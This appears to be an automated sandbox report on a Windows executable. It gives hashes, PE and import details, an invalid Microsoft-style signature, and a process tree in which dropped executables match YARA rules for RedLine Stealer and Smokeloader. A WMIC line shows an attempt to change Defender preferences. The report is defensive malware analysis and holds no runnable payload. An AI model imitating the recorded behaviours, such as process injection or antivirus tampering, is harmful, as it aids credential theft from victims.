                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................R.......l.......m......zF...........b.h....b.l.....b.S....Rich...................PE..L......a..........................................@..........................P......m.m...@..........................................@...........................A.................................. .l.@............................................text...=........................... ..`.data............B`.................@....idata................l.............@..@.debug................l.............@....reloc...A.......B....l.............@..B.rsrc........@.......,m.............@..@........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                Entropy (8bit):4.298435360966713
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:1F69DF399D44559386649E2BAA7D570C
                                                                                                                                                                                                                                SHA1:C2F170827897CBDD2FC6CC264A6866BF5C381B58
                                                                                                                                                                                                                                SHA-256:64565B9C477FBEC9A7F5B9CA43392CF195348AAFE8E92D3A490D64772B464F04
                                                                                                                                                                                                                                SHA-512:337BA9D984C6417979A75D5402F55B04BCF8082A08E5AC05C87B47AAE6CCA5A517A37BC5A2B9421F4E78A746D6BC1A5AEDBEC59ABDED14FA16202ED5A4A97BC9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"fN.................................................................................................................................................................................................................................................................................................................................................1.[.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                \Device\ConDrv

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                Entropy (8bit):4.837326145256008
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:C1028F4DC91171021CC811DEC5CBD173
                                                                                                                                                                                                                                SHA1:72358DE1D13924E08B33CE14A9D1E0BB0E04DFB1
                                                                                                                                                                                                                                SHA-256:8D4075306F058EFA27EBCCDA57983F28F196141049701D07E044B7EA17F21B12
                                                                                                                                                                                                                                SHA-512:72DC710CB1DE2D86121A7FAF4FE93D64B8A0FB9C9C7848A7A1ACA9BC429040CA8565C48861F53107A9709AAB2235DF6953AEF9282F382BE960344CD1E08735A9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Executing (MSFT_MpPreference)->Add()...ERROR:...Description = Generic failure...

                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):6.590225151018962
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                                                                                                                                                                                • Win64 Executable Console (202006/5) 47.64%
                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 2.83%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.47%
                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.47%
                                                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                                                File size:3'428'696 bytes
                                                                                                                                                                                                                                MD5:b9882fe8bb7ab2a4d094f9ff5442df1c
                                                                                                                                                                                                                                SHA1:e17c146530a4371e0595c195c24863935a3dee8b
                                                                                                                                                                                                                                SHA256:4f47d84b03f5cfa3845d1b36df5e40df984756fc6ba2d98586eb39dced212628
                                                                                                                                                                                                                                SHA512:bee33d43deb43854975e6c7a57f27ab8c6519ea3e6df51297ca670ac62831f29f6a18eff0bb0af14f9e985ebf9e2169ed97582fa64998cfb33b1d8b61ec72db4
                                                                                                                                                                                                                                SSDEEP:49152:zUIbNigeVE2MD7ZDAgUf0dgF8bEOlf84L:JI3bg3J
                                                                                                                                                                                                                                TLSH:BCF59E0AE3E805D5E16BD630CA29DB32D671B89A0731D74F1927D3462F73A924F7B221
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y..,=...=...=...;4.~1...;4.~,...;4.~....4.e.3...v..~6...=...)...W4.~6...W4.~x...=...?...W4.~<...W4..<...W4.~<...Rich=..........

                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Entrypoint:0x14006aab0
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                Subsystem:windows cui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x6621B49D [Fri Apr 19 00:02:37 2024 UTC]
                                                                                                                                                                                                                                TLS Callbacks:0x4006aac4, 0x1
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:d4e6049ebe9b9b358b43e39f88c5de46

                                                                                                                                                                                                                                Authenticode Signature

                                                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                                                Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                                Error Number:-2146762487
                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                • 21/04/2024 07:05:59 21/04/2025 07:05:59
                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                Thumbprint MD5:D79A1FE7829C9CADAC5773537D9EBCA0
                                                                                                                                                                                                                                Thumbprint SHA-1:41B5175C2B9B429F25D8DA75B51C90C3BE9135BF
                                                                                                                                                                                                                                Thumbprint SHA-256:B920FA724FBCCAD63CA5D526F78D138F32120EE69AC714501D6B59B3E51B4DA8
                                                                                                                                                                                                                                Serial:00A1EC43858F589F40A83F61021DBA57FD

                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                call 00007F57493603CCh
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                jmp 00007F574935FB77h
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                cmp edx, 02h
                                                                                                                                                                                                                                jne 00007F574935FD62h
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                mov dword ptr [esp+08h], ebx
                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                sub esp, 20h
                                                                                                                                                                                                                                mov ecx, dword ptr [002B89F7h]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                mov eax, dword ptr [00000058h]
                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                mov eax, 00000100h
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                mov edx, dword ptr [eax+ecx*8]
                                                                                                                                                                                                                                inc edx
                                                                                                                                                                                                                                cmp byte ptr [edx+eax], 00000001h
                                                                                                                                                                                                                                je 00007F574935FD2Eh
                                                                                                                                                                                                                                inc edx
                                                                                                                                                                                                                                mov byte ptr [edx+eax], 00000001h
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                lea ebx, dword ptr [00157DF9h]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                lea edi, dword ptr [00157DF2h]
                                                                                                                                                                                                                                jmp 00007F574935FD14h
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                je 00007F574935FD08h
                                                                                                                                                                                                                                call dword ptr [00157D1Ah]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                add ebx, 08h
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                cmp ebx, edi
                                                                                                                                                                                                                                jne 00007F574935FCEBh
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                mov ebx, dword ptr [esp+30h]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                add esp, 20h
                                                                                                                                                                                                                                pop edi
                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                inc ebp
                                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                lea edx, dword ptr [eax+02h]
                                                                                                                                                                                                                                jmp 00007F574935FC8Fh
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                jmp 00007F57493606D0h
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                call 00007F574935FDC8h
                                                                                                                                                                                                                                jmp 00007F574935FD04h
                                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                jmp 00007F574935FCECh
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                                mov eax, dword ptr [ecx+38h]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                mov ecx, edx
                                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                                mov edx, ecx
                                                                                                                                                                                                                                call 00007F574935FD12h
                                                                                                                                                                                                                                mov eax, 00000001h

                                                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x2efd200x58.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2efd780xf0.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3420000xa2c.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3240000x1c758.pdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x3438780x18e0.reloc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3430000x10400.reloc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x2a2f600x1c.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x2a31000x28.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2a2e200x140.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x1c20000x820.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                .text0x10000x746680x748000c190e97c93d543a6fcb516020aa4716False0.4500842442328326data6.62793721677797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .managed0x760000x14bc880x14be001342a2d7314a722bd15b5a7d885cafe0False0.4593463100282486data6.443735456874621IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rdata0x1c20000x12fab60x12fc009d6a5c3e15519d0105a4874ec954c8fdFalse0.40036731610082305data6.010446384557858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .data0x2f20000x31c380x22e00144561dc644a6516434ab34501b88cbfFalse0.21279261872759855data3.656162662924527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .pdata0x3240000x1c7580x1c800c05234c0e72312cacecd6446e573b413False0.4897889254385965SysEx File - Roland6.278035079670816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                _RDATA0x3410000x1f40x200a361a21b18210af539022cc7692d7b69False0.53515625data4.225357642778286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rsrc0x3420000xa2c0xc006a7cdc2cae875370a6ddc97710aea48eFalse0.2724609375data4.4731114607795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .reloc0x3430000x104000x10400e2f689150cd4320f95e78e99ef11167cFalse0.2231971153846154data5.452014151474419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                RT_VERSION0x3420b80x3c4data0.5051867219917012
                                                                                                                                                                                                                                RT_VERSION0x34247c0x3c4dataEnglishUnited States0.5072614107883817
                                                                                                                                                                                                                                RT_MANIFEST0x3428400x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                ADVAPI32.dllRegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegEnumKeyExW, RegEnumValueW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, GetTokenInformation, DuplicateTokenEx, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser, CheckTokenMembership, EventWrite, EventRegister, EventEnabled
                                                                                                                                                                                                                                bcrypt.dllBCryptDestroyKey, BCryptOpenAlgorithmProvider, BCryptDecrypt, BCryptGenerateSymmetricKey, BCryptCloseAlgorithmProvider, BCryptGenRandom
                                                                                                                                                                                                                                KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, SetLastError, FormatMessageW, GetLastError, FreeConsole, AllocConsole, GetConsoleWindow, LocalFree, VirtualAllocEx, ResumeThread, CreateProcessW, GetThreadContext, SetThreadContext, WriteProcessMemory, ExitProcess, CloseThreadpoolIo, SetThreadErrorMode, GetModuleFileNameW, MultiByteToWideChar, GetStdHandle, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LoadLibraryExW, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, GetLocaleInfoEx, EnumCalendarInfoExEx, LCMapStringEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, LocaleNameToLCID, ResolveLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetTickCount64, GetCurrentProcessorNumber, GetCurrentProcess, GetCurrentThread, WaitForSingleObject, Sleep, CreateThreadpoolWork, CloseThreadpoolWork, SubmitThreadpoolWork, CreateThreadpoolWait, SetThreadpoolWait, WaitForThreadpoolWaitCallbacks, CloseThreadpoolWait, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, WaitForMultipleObjectsEx, GetFileAttributesExW, GetFullPathNameW, GetLongPathNameW, LocalAlloc, GetConsoleOutputCP, WideCharToMultiByte, WriteFile, GetProcAddress, RaiseFailFastException, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, EnumTimeFormatsEx, CopyFileExW, CreateFileW, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetCurrentDirectoryW, GetFileInformationByHandleEx, GetFileType, GetOverlappedResult, GetSystemDirectoryW, ReadFile, SetFileInformationByHandle, SetFilePointerEx, CreateThread, DuplicateHandle, GetThreadPriority, SetThreadPriority, GetDynamicTimeZoneInformation, GetTimeZoneInformation, CloseHandle, SetEvent, CreateEventExW, GetEnvironmentVariableW, GetExitCodeProcess, TerminateProcess, OpenProcess, GetProcessId, QueryFullProcessImageNameW, CreatePipe, GetCPInfoExW, GetConsoleCP, K32EnumProcesses, FlushProcessWriteBuffers, GetCurrentThreadId, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObjectEx, VirtualQuery, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, SuspendThread, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetTickCount, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, GetWriteWatch, ResetWriteWatch, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, InitializeSListHead, GetCurrentProcessId, SleepConditionVariableSRW, WakeAllConditionVariable, AcquireSRWLockExclusive, ReleaseSRWLockExclusive
                                                                                                                                                                                                                                ole32.dllCoTaskMemAlloc, CoUninitialize, CoInitializeEx, CoTaskMemFree, CoGetApartmentType, CoWaitForMultipleHandles, CoCreateGuid
                                                                                                                                                                                                                                USER32.dllLoadStringW
                                                                                                                                                                                                                                api-ms-win-crt-heap-l1-1-0.dllfree, malloc, _set_new_mode, calloc, _callnewh
                                                                                                                                                                                                                                api-ms-win-crt-math-l1-1-0.dll__setusermatherr, sin, modf, tan, ceil, cos, pow, floor
                                                                                                                                                                                                                                api-ms-win-crt-string-l1-1-0.dllstrncpy_s, _stricmp, strcpy_s, _wcsicmp, strcmp, wcsncmp
                                                                                                                                                                                                                                api-ms-win-crt-runtime-l1-1-0.dllexit, _exit, _initterm, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initterm_e, _get_initial_wide_environment, _initialize_wide_environment, abort, __p___argc, _register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___wargv, _seh_filter_exe, _set_app_type, _configure_wide_argv
                                                                                                                                                                                                                                api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf_s, _set_fmode, __stdio_common_vsscanf, __p__commode, __stdio_common_vfprintf, __acrt_iob_func
                                                                                                                                                                                                                                api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                                                                                                                                                                                                Exports

                                                                                                                                                                                                                                NameOrdinalAddress
                                                                                                                                                                                                                                DotNetRuntimeDebugHeader10x1403140f0

                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:21:37:07
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6385c0000
                                                                                                                                                                                                                                File size:3'428'696 bytes
                                                                                                                                                                                                                                MD5 hash:B9882FE8BB7AB2A4D094F9FF5442DF1C
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                Start time:21:37:07
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:21:37:08
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                                                                                                Imagebase:0x540000
                                                                                                                                                                                                                                File size:43'008 bytes
                                                                                                                                                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:21:37:10
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000003.1624901520.0000000006A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:21:37:12
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe"
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:4'407'808 bytes
                                                                                                                                                                                                                                MD5 hash:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:21:37:13
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:21:37:13
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
                                                                                                                                                                                                                                Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:21:37:13
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
